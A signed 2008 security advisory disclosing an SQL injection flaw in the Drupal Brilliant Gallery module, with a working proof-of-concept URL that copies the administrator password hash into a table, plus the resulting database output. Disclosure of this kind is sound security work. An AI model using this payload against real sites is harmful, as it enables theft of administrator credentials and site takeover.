-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 * Discovery Date: Sept 17, 2008 * Security risk: high * Exploitable from: Remote * Vulnerability: SQL Injection * Discovered by: Justin C. Klein Keane (a.k.a. Mad Irish) Description Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security. The Brilliant module (http://drupal.org/project/brilliant_gallery), created by Vacilanda (http://www.vacilando.org/) is designed to allow users to easily create dynamic picture galleries by uploading images directly to a server and including code directly within nodes to display the gallery. The critical flaw exists within the brilliant_gallery_checklist_save() function (lines 109-129 of briliant_gallery.module). This function accepts three parameters ($nid,$qid, and $state), all of which can be manipulated via a properly crafted URL (defined by a callback in brilliant_gallery_menu() on line 307 of brilliant_gallery.module) These parameters are then used to craft SQL injections via remote URL request. 5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable Testing for Vulnerability Calling the URL: http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from users where uid=1),3),(4,4,4,'4 will cause the administrator password to be inserted into the brilliant_gallery_checklist table in the Drupal database: mysql> select * from brilliant_gallery_checklist; +-----+------+----------------------------------+-------+ | nid | user | qid | state | +-----+------+----------------------------------+-------+ | 2 | 0 | 2 | 2 | | 3 | 3 | 4202a5f87b68583e2eaaa6922c8c38d1 | 3 | | 4 | 4 | 4 | 4 | +-----+------+----------------------------------+-------+ Impact Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise since the administrator can configure file uploads and alter any content on the Drupal installation. Determining Version The brilliant_gallery.info page for vulnerable versions displays the following information: ; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $ name = Brilliant Gallery description = Creates a fully customizable table gallery of quality-scaled images from a pre-defined folder. dependencies = lightbox2 colorpicker package = Media ; Information added by drupal.org packaging script on 2008-05-05 version = "5.x-3.1" project = "brilliant_gallery" datestamp = "1210030204" ; Information added by drupal.org packaging script on 2008-07-17 version = "5.x-4.1" project = "brilliant_gallery" datestamp = "1216327204" Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214). Vendor Response Drupal security team contacted via e-mail September 19, 2008. Vendor contacted September 19, 2008 via contact form submission at http://www.vacilando.eu/contact. Vulnerability announcement should be available at http://drupal.org/security by Wednesday, September 24, 2008. No details about patch release are available at this time. - -- Justin C. Klein Keane http://www.MadIrish.net http://Justin.MadIrish.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iPwEAQECAAYFAkjalScACgkQkSlsbLsN1gAR7Ab/bL1vvJvVhIVlkE5aOKUmH3K5 30qO/paQ8xqstrxVT/sMJYN7MXtjYL9gk73qFNhOBEgIbs9Dth7CqBMdk5vT2BiO 3lZcuNuquwLNv2ZhPK6bOUN9G0Pdmntr2YqNTgXCSPNpM7F+K75uPNENRFZKL8Yb DLgn3q1smbJVFLm8/Xt8Y0g7Q7C8kxh7TYTK/WyhNs+KrxlzsilpAViydmqkNuVR ob/nsYj/o5d8DN8vk0xHrvzNbeQCJX2tSZKKh6427zC6zK+dm8uTAnALpHzS/BT5 R2Oq9aOFw1BeGdcUKmk= =QUap -----END PGP SIGNATURE-----